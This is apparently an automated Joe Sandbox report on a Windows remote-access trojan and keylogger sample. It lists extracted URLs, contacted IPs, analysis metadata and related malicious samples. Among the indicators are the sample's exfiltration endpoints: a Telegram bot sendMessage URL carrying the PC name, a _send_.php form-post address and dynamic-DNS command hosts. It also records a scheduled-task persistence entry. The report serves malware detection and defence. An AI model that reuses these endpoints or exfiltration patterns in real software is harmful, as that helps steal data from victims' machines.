                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://chrome.google.com/webstore?hl=enzDAKFK.exe, 00000010.00000002.4132563697.0000000002A47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://varders.kozow.com:8081SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sajatypeworks.comSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.typography.netDSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20azDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.sakkal.comR:SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731386438.000000000633C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://x1.c.lencr.org/0zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://x1.i.lencr.org/0zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallzDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://checkip.dyndns.org/qSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://chrome.google.com/webstore?hl=enlBzDAKFK.exe, 00000010.00000002.4132563697.0000000002A42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://rasextraders.comzDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.fonts.comSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://checkip.dyndns.comSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1725042592.0000000003532000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1767372699.0000000002752000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.sakkal.comSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.org/xml/SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.office.com/zDAKFK.exe, 00000010.00000002.4132563697.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fontbureau.comSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://r11.i.lencr.org/0/zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://r11.o.lencr.org0#zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://upx.sf.netAmcache.hve.19.drfalse
                                                                                                        		high
                                                                                                        http://checkip.dyndns.orgSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://mail.rasextraders.comzDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • 0%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.carterandcone.comlSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://aborters.duckdns.org:8081SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.founder.com.cn/cnSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://reallyfreegeoip.org/xml/173.254.250.79$zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://51.38.247.67:8081/_send_.php?LzDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anotherarmy.dns.army:8081SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://reallyfreegeoip.orgzDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://reallyfreegeoip.org/xml/173.254.250.794zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExampleszDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          149.154.167.220
                                                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                          188.114.97.3
                                                                                                                                          		reallyfreegeoip.orgEuropean Union
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          205.147.111.116
                                                                                                                                          		rasextraders.comIndia
                                                                                                                                          		17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse
                                                                                                                                          193.122.130.0
                                                                                                                                          		checkip.dyndns.comUnited States
                                                                                                                                          		31898ORACLE-BMC-31898USfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1550765
                                                                                                                                          Start date and time:2024-11-07 06:19:12 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 9m 49s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:24
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@26/20@4/4
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                          • Number of executed functions: 190
                                                                                                                                          • Number of non-executed functions: 15
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                                                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, PID 7176 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          00:20:03API Interceptor2x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe modified
                                                                                                                                          00:20:05API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                                                          00:20:08API Interceptor9941022x Sleep call for process: zDAKFK.exe modified
                                                                                                                                          00:20:33API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                          05:20:05Task SchedulerRun new task: zDAKFK path: C:\Users\user\AppData\Roaming\zDAKFK.exe

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          149.154.167.220FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                            05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                          173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              188.114.97.3Hesap.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.rtprajalojago.live/74ri/
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                              • sosipisos.cc/SXQNMYTM.exe
                                                                                                                                                              7RAK4mZ6nc.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                              • downsexv.com:8080/pptFudI4N_bZd9h2vlE2HgX6nJupnvnNvPpodtqLmxX2OC5MJtjR8Cw2hx7Jj0FM_ofkLnmJ
                                                                                                                                                              Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.bzxs.info/v58i/
                                                                                                                                                              icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.figa1digital.services/zjtq/
                                                                                                                                                              xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • paste.ee/d/Sv5Cw
                                                                                                                                                              ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.bayarcepat19.click/blmi/
                                                                                                                                                              mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.casesrep.site/qagl/
                                                                                                                                                              PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.freedietbuilder.online/nnla/
                                                                                                                                                              SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.vrxlzluy.shop/d8g5/
                                                                                                                                                              205.147.111.116https://investkarlo.com/udid/Get hashmaliciousUnknownBrowse
                                                                                                                                                                9wk1DR95qi.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  2222093748098765434567898.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    193.122.130.0vHXObqOSGu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    YvY5omjy2a.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    RFQABCO004806L____________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    rHJM63U0Nt.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    0oyt0YS20b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    20241104095027_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    Purchase order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/

                                                                                                                                                                    Domains

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    reallyfreegeoip.orgFiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    checkip.dyndns.comFiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                    PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    vHXObqOSGu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    api.telegram.orgFmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
